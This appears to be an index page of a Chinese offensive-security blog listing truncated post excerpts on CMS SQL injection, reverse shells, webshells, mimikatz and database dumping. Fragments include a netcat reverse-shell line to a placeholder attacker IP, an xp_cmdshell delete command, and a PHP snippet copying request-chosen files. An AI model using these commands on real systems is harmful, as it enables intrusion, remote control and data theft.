暗月博客发表的所有文章

moonsec_com

74CMS Sql 注入漏洞一枚1

漏洞作者： ′ 雨。在user/user_pms.php中 elseif($act=="add_save") { $setsqlarr['msgtype']=2; $setsq...

11月21日341 views评论

阅读全文

mysql搜索型注入盲注语句备份

先来说一点基础的东西。 php中和mysql 的一点基本的知识。大鸟飞过了 left() 从左向右截取 length()函数是计算括号中数据的长度，回显为纯数字，可以用大于小于和等...

11月21日moonsec_com393 views评论

阅读全文

linux下反弹Shell的五种方法

1. nc <attacker_ip> <port> -e /bin/bash 2. mknod backpipe p;...

11月21日moonsec_com477 views评论

阅读全文

moonsec_com

开源网站管理工具——Altman

Altman，the webshell tool，自己写的一款开源软件。 0×00前言之前用过几款webshell 工具，有B/C的也有C/S的，有的只能用于php或者aspx，...

11月21日295 views评论

阅读全文

moonsec_com

神器mimikatz2.0发布

mimikatz 最近发布了它的2.0版本，抓密码命令更加简单了，估计作者也看到了对它这个神器最多的研究就是直接抓密码，为神马不发布一个直接一键版，哈哈哈哈哈。新功能还包括能够通...

11月21日402 views评论

阅读全文

一个奇怪的ASP一句话

一句话代码： <script language="javascript" runat="server"> </script> 利用语句（参数a=）：

11月21日moonsec_com407 views评论

阅读全文

moonsec_com

CS渗透之绕过登陆

CS绕过登陆最近博客少了更新，今天抽空写一篇吧。大多数我们渗透都是针对b/s模型很少是针对c/s模型。

11月21日657 views评论

阅读全文

moonsec_com

云购cms注入漏洞利用工具

继续来福利了。之前写好的，一直放在内部群。如今0day 早已有人放出。工具也放出来吧。最近陆续发0day 发工具。

11月21日443 views评论

阅读全文

moonsec_com

DZ论坛最新爆路径0DAY

这个文件dz3 3.1都会存在只要最新安装dz论坛都会存在。 <?php $gj_config = array( 'url_server' => 'http://op...

11月21日654 views评论

阅读全文

站库分离拖库技巧

Mssql SA权限 exec master.dbo.xp_cmdshell "del c:/bak" -- backup database 数据库名 to disk = 'c:/bak' --备份整...

11月21日moonsec_com333 views评论

阅读全文

竞争条件漏洞

<?php if($_REQUEST['file']){ copy($_REQUEST['file'],$_REQUEST['PATH']); } if($_REQUEST['file']){ ...

11月21日moonsec_com301 views评论

阅读全文

moonsec_com

phpcms最新版本sql注射一枚

注：经测试需register_globals=on 首先我是官网选择的utf-8版本的然后下载的，（ps:应该是最新的吧...）下载之后搭建好之后要进

11月21日259 views评论

阅读全文

暗月博客

74CMS Sql 注入漏洞一枚1

mysql搜索型注入盲注语句备份

linux下反弹Shell的五种方法

开源网站管理工具——Altman

神器mimikatz2.0发布

一个奇怪的ASP一句话

CS渗透之绕过登陆

云购cms注入漏洞利用工具

DZ论坛最新爆路径0DAY

站库分离拖库技巧

竞争条件漏洞

phpcms最新版本sql注射一枚

在线咨询

微信